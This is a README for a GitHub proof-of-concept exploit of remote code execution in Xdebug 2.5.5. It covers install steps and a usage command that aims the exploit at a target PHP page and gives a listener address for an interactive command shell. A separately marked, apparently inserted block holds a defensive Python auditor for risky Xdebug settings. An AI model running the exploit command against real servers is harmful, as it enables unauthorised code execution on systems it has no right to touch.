xdebug 2.5.5 RCE exploit
https://github.com/d3ext/xdebug-exploit

README

# xdebug 2.5.5 RCE

An automated POC exploit of the xdebug 2.5.5 RCE vulnerability

## Vulnerability

This vulnerability can be abused through the `eval` command present in Xdebug versions 2.5.5 and below, which allows an attacker to execute arbitrary PHP code in the context of the web user.
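The debugger's `eval` command is only reachable when Xdebug's DBGp listener is exposed to clients other than the developer's own machine, so the practical mitigation is a configuration check. The following is an added example, not part of this project's code: it parses a php.ini fragment and flags the Xdebug 2.x directives that open remote debugging to arbitrary clients (`remote_connect_back`, a non-local `remote_host`, `remote_autostart`). The two ini snippets are constructed samples.

```python
from typing import Dict, List

# Values Xdebug treats as "on" for boolean directives (after lowercasing).
_ENABLED = {"1", "on", "true", "yes"}

# Constructed sample configs: the exposed setup this kind of exploit relies on,
# and a hardened one that keeps the DBGp listener on the developer's machine.
WEAK_INI = """[xdebug]
xdebug.remote_enable = 1
xdebug.remote_connect_back = 1   ; dial back to whoever sent the request
xdebug.remote_autostart = On
"""
HARDENED_INI = """[xdebug]
xdebug.remote_enable = 1
xdebug.remote_connect_back = 0
xdebug.remote_host = 127.0.0.1
xdebug.remote_autostart = 0
"""


def parse_ini(text: str) -> Dict[str, str]:
    """php.ini fragment -> {directive: value}; comments and [sections] dropped."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip("\"'").lower()
    return settings


def audit_xdebug(settings: Dict[str, str]) -> List[str]:
    """One finding per directive that lets an untrusted client reach the
    debugger, and with it the eval command the README describes."""
    findings: List[str] = []
    if settings.get("xdebug.remote_enable", "0") not in _ENABLED:
        return findings  # remote debugging off: DBGp is never started
    if settings.get("xdebug.remote_connect_back", "0") in _ENABLED:
        findings.append("remote_connect_back=1: Xdebug connects back to the "
                        "requesting client, so any visitor can act as debugger")
    else:
        host = settings.get("xdebug.remote_host", "localhost")
        if host not in ("localhost", "127.0.0.1", "::1"):
            findings.append(f"remote_host={host}: debugger traffic leaves the host")
    if settings.get("xdebug.remote_autostart", "0") in _ENABLED:
        findings.append("remote_autostart=1: a debug session starts on every request")
    return findings
```

Run `audit_xdebug(parse_ini(WEAK_INI))` to see the two findings; the hardened sample returns an empty list.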

## Installation

> Download from source
```sh
git clone https://github.com/D3Ext/xdebug-exploit
cd xdebug-exploit
pip3 install -r requirements.txt
python3 exploit.py
```

## Usage

Just execute the exploit and specify a valid URL pointing to a PHP file, such as `index.php`, together with the local host address. The exploit will then try to establish a pseudo-terminal that lets you execute commands.

```sh
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
```

\* *In some cases the output won't be reflected at all and you will only see the first line of the executed command; this is not a problem of the script, the vulnerability simply behaves this way.*

## References

- https://www.exploit-db.com/exploits/44568
- https://www.tenable.com/plugins/nessus/112210
- https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

## Disclaimer

Use this exploit under your own responsibility! The author is not responsible for any bad usage of it.

## License

This project is licensed under the [MIT](https://github.com/D3Ext/xdebug-exploit/blob/main/LICENSE) license.

Copyright © 2025, *D3Ext*